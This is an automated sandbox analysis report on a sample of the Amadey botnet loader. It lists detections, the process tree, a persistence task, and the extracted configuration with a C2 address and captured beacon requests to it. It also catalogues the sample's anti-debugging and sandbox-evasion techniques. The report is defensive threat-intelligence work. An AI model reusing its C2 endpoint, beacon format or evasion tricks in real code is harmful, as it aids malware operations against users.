Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1559376
MD5: ebe6de9be122d27057536193303f1f89
SHA1: 199b00d481006678f3a2db4902910a883be2f275
SHA256: bace923f8be90bf0f398e9310d52723265e250651cb36115bc233ca3300160a6
Tags: exe, user-Bitsight

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6760 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EBE6DE9BE122D27057536193303F1F89)
    • skotes.exe (PID: 5752 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: EBE6DE9BE122D27057536193303F1F89)
  • skotes.exe (PID: 1136 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: EBE6DE9BE122D27057536193303F1F89)
  • skotes.exe (PID: 3612 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: EBE6DE9BE122D27057536193303F1F89)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware configuration: {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source | Rule | Description | Author | Strings
00000000.00000002.1757169218.0000000000F21000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000003.1714685020.0000000005260000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000006.00000003.2310587300.00000000048D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000001.00000002.1786704967.0000000000E91000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000002.00000003.1743754527.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
Source | Rule | Description | Author | Strings
2.2.skotes.exe.e90000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
1.2.skotes.exe.e90000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
6.2.skotes.exe.e90000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0.2.file.exe.f20000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
                    No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T13:08:05.776431+0100 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.4 | 49783 | 185.215.113.43 | 80 | TCP


                    AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.43/Zu7JuNko/index.php32 | Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpdedO | Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php# | Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/Zu7JuNko/index.phpm | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000000.00000002.1757169218.0000000000F21000.00000040.00000001.01000000.00000003.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | ReversingLabs: Detection: 52%
Source: file.exe | ReversingLabs: Detection: 52%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                    Networking

Source: Network traffic | Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49783 -> 185.215.113.43:80
Source: Malware configuration extractor | IPs: 185.215.113.43
Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 | Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: Joe Sandbox View | IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00E9BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile | 6_2_00E9BE30
Source: unknown | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2957282024.0000000000658000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php#
Source: skotes.exe, 00000006.00000002.2957282024.0000000000658000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php32
Source: skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpH
Source: skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpX
Source: skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpdedO
Source: skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpm
Source: skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded

                    System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: skotes.exe.0.dr | Static PE information: section name:
Source: skotes.exe.0.dr | Static PE information: section name: .idata
Source: skotes.exe.0.dr | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00E9E530 | 6_2_00E9E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00ED78BB | 6_2_00ED78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00ED8860 | 6_2_00ED8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00ED7049 | 6_2_00ED7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00E94DE0 | 6_2_00E94DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00ED31A8 | 6_2_00ED31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00E9E530 | 6_2_00E9E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00ED2D10 | 6_2_00ED2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00ED779B | 6_2_00ED779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00E94B30 | 6_2_00E94B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00EC7F36 | 6_2_00EC7F36
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe BACE923F8BE90BF0F398E9310D52723265E250651CB36115BC233CA3300160A6
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 00EA7A00 appears 43 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9982703933923706
Source: file.exe | Static PE information: Section: ihqucnpr ZLIB complexity 0.9945654794045048
Source: skotes.exe.0.dr | Static PE information: Section: ZLIB complexity 0.9982703933923706
Source: skotes.exe.0.dr | Static PE information: Section: ihqucnpr ZLIB complexity 0.9945654794045048
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 52%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1863680 > 1048576
                    Source: file.exeStatic PE information: Raw size of ihqucnpr is bigger than: 0x100000 < 0x195200

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.f20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 1.2.skotes.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 2.2.skotes.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 6.2.skotes.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW;
                    Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                    Source: file.exe | Static PE information: real checksum: 0x1c788c should be: 0x1c7fed
                    Source: skotes.exe.0.dr | Static PE information: real checksum: 0x1c788c should be: 0x1c7fed
                    Source: file.exe | Static PE information: section name:
                    Source: file.exe | Static PE information: section name: .idata
                    Source: file.exe | Static PE information: section name:
                    Source: file.exe | Static PE information: section name: ihqucnpr
                    Source: file.exe | Static PE information: section name: loaatlni
                    Source: file.exe | Static PE information: section name: .taggant
                    Source: skotes.exe.0.dr | Static PE information: section name:
                    Source: skotes.exe.0.dr | Static PE information: section name: .idata
                    Source: skotes.exe.0.dr | Static PE information: section name:
                    Source: skotes.exe.0.dr | Static PE information: section name: ihqucnpr
                    Source: skotes.exe.0.dr | Static PE information: section name: loaatlni
                    Source: skotes.exe.0.dr | Static PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00EAD91C push ecx; ret 6_2_00EAD92F
                    Source: file.exe | Static PE information: section name: entropy: 7.984163240337756
                    Source: file.exe | Static PE information: section name: ihqucnpr entropy: 7.953078647253167
                    Source: skotes.exe.0.dr | Static PE information: section name: entropy: 7.984163240337756
                    Source: skotes.exe.0.dr | Static PE information: section name: ihqucnpr entropy: 7.953078647253167
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
                    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Regmonclass
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\skotes.job
                    Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8F0FD second address: F8F103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1107915 second address: 110793D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6F31405BD6h 0x0000000a pop edx 0x0000000b push esi 0x0000000c jmp 00007F6F31405BE9h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop esi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110793D second address: 1107995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF70h 0x00000007 jmp 00007F6F31ADDF6Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F6F31ADDF6Eh 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F6F31ADDF78h 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f je 00007F6F31ADDF66h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F7844 second address: 10F784A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F784A second address: 10F7850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1106912 second address: 1106918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
